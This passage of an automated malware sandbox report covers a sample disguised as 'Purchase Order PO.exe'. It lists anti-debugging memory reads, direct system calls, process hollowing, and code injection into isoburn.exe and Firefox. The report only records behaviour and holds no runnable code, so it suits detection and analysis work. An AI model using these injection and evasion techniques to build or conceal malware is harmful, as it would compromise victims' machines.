                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB27ED mov eax, dword ptr fs:[00000030h]2_2_01AB27ED
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1E7E1 mov eax, dword ptr fs:[00000030h]2_2_01B1E7E1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A947FB mov eax, dword ptr fs:[00000030h]2_2_01A947FB
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A947FB mov eax, dword ptr fs:[00000030h]2_2_01A947FB
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9C7C0 mov eax, dword ptr fs:[00000030h]2_2_01A9C7C0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B107C3 mov eax, dword ptr fs:[00000030h]2_2_01B107C3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0C730 mov eax, dword ptr fs:[00000030h]2_2_01B0C730
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACC720 mov eax, dword ptr fs:[00000030h]2_2_01ACC720
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACC720 mov eax, dword ptr fs:[00000030h]2_2_01ACC720
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC273C mov eax, dword ptr fs:[00000030h]2_2_01AC273C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC273C mov ecx, dword ptr fs:[00000030h]2_2_01AC273C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC273C mov eax, dword ptr fs:[00000030h]2_2_01AC273C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACC700 mov eax, dword ptr fs:[00000030h]2_2_01ACC700
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A90710 mov eax, dword ptr fs:[00000030h]2_2_01A90710
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC0710 mov eax, dword ptr fs:[00000030h]2_2_01AC0710
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A98770 mov eax, dword ptr fs:[00000030h]2_2_01A98770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0770 mov eax, dword ptr fs:[00000030h]2_2_01AA0770
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC674D mov esi, dword ptr fs:[00000030h]2_2_01AC674D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC674D mov eax, dword ptr fs:[00000030h]2_2_01AC674D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC674D mov eax, dword ptr fs:[00000030h]2_2_01AC674D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B14755 mov eax, dword ptr fs:[00000030h]2_2_01B14755
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1E75D mov eax, dword ptr fs:[00000030h]2_2_01B1E75D
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A90750 mov eax, dword ptr fs:[00000030h]2_2_01A90750
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2750 mov eax, dword ptr fs:[00000030h]2_2_01AD2750
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2750 mov eax, dword ptr fs:[00000030h]2_2_01AD2750
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACC6A6 mov eax, dword ptr fs:[00000030h]2_2_01ACC6A6
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC66B0 mov eax, dword ptr fs:[00000030h]2_2_01AC66B0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A94690 mov eax, dword ptr fs:[00000030h]2_2_01A94690
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A94690 mov eax, dword ptr fs:[00000030h]2_2_01A94690
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B106F1 mov eax, dword ptr fs:[00000030h]2_2_01B106F1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B106F1 mov eax, dword ptr fs:[00000030h]2_2_01B106F1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E6F2 mov eax, dword ptr fs:[00000030h]2_2_01B0E6F2
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E6F2 mov eax, dword ptr fs:[00000030h]2_2_01B0E6F2
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E6F2 mov eax, dword ptr fs:[00000030h]2_2_01B0E6F2
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E6F2 mov eax, dword ptr fs:[00000030h]2_2_01B0E6F2
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACA6C7 mov ebx, dword ptr fs:[00000030h]2_2_01ACA6C7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACA6C7 mov eax, dword ptr fs:[00000030h]2_2_01ACA6C7
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9262C mov eax, dword ptr fs:[00000030h]2_2_01A9262C
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC6620 mov eax, dword ptr fs:[00000030h]2_2_01AC6620
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC8620 mov eax, dword ptr fs:[00000030h]2_2_01AC8620
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AAE627 mov eax, dword ptr fs:[00000030h]2_2_01AAE627
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA260B mov eax, dword ptr fs:[00000030h]2_2_01AA260B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA260B mov eax, dword ptr fs:[00000030h]2_2_01AA260B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA260B mov eax, dword ptr fs:[00000030h]2_2_01AA260B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA260B mov eax, dword ptr fs:[00000030h]2_2_01AA260B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA260B mov eax, dword ptr fs:[00000030h]2_2_01AA260B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA260B mov eax, dword ptr fs:[00000030h]2_2_01AA260B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA260B mov eax, dword ptr fs:[00000030h]2_2_01AA260B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AD2619 mov eax, dword ptr fs:[00000030h]2_2_01AD2619
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0E609 mov eax, dword ptr fs:[00000030h]2_2_01B0E609
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACA660 mov eax, dword ptr fs:[00000030h]2_2_01ACA660
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACA660 mov eax, dword ptr fs:[00000030h]2_2_01ACA660
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC2674 mov eax, dword ptr fs:[00000030h]2_2_01AC2674
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5866E mov eax, dword ptr fs:[00000030h]2_2_01B5866E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5866E mov eax, dword ptr fs:[00000030h]2_2_01B5866E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AAC640 mov eax, dword ptr fs:[00000030h]2_2_01AAC640
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B189B3 mov esi, dword ptr fs:[00000030h]2_2_01B189B3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B189B3 mov eax, dword ptr fs:[00000030h]2_2_01B189B3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B189B3 mov eax, dword ptr fs:[00000030h]2_2_01B189B3
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A909AD mov eax, dword ptr fs:[00000030h]2_2_01A909AD
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A909AD mov eax, dword ptr fs:[00000030h]2_2_01A909AD
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA29A0 mov eax, dword ptr fs:[00000030h]2_2_01AA29A0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1E9E0 mov eax, dword ptr fs:[00000030h]2_2_01B1E9E0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC29F9 mov eax, dword ptr fs:[00000030h]2_2_01AC29F9
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Memory written: C:\Users\user\Desktop\Purchase Order PO.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: NULL target: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Section loaded: NULL target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: NULL target: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe protection: read write
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: NULL target: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\isoburn.exe Thread register set: target process: 1148
                Source: C:\Windows\SysWOW64\isoburn.exe Thread APC queued: target process: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Process created: C:\Users\user\Desktop\Purchase Order PO.exe "C:\Users\user\Desktop\Purchase Order PO.exe"
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe Process created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
                Source: C:\Windows\SysWOW64\isoburn.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: QfgdvbjddZ.exe, 00000006.00000000.2053668559.0000000001820000.00000002.00000001.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000006.00000002.4169975849.0000000001820000.00000002.00000001.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000008.00000002.4170102889.0000000001870000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: QfgdvbjddZ.exe, 00000006.00000000.2053668559.0000000001820000.00000002.00000001.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000006.00000002.4169975849.0000000001820000.00000002.00000001.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000008.00000002.4170102889.0000000001870000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: QfgdvbjddZ.exe, 00000006.00000000.2053668559.0000000001820000.00000002.00000001.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000006.00000002.4169975849.0000000001820000.00000002.00000001.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000008.00000002.4170102889.0000000001870000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: QfgdvbjddZ.exe, 00000006.00000000.2053668559.0000000001820000.00000002.00000001.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000006.00000002.4169975849.0000000001820000.00000002.00000001.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000008.00000002.4170102889.0000000001870000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Users\user\Desktop\Purchase Order PO.exe VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
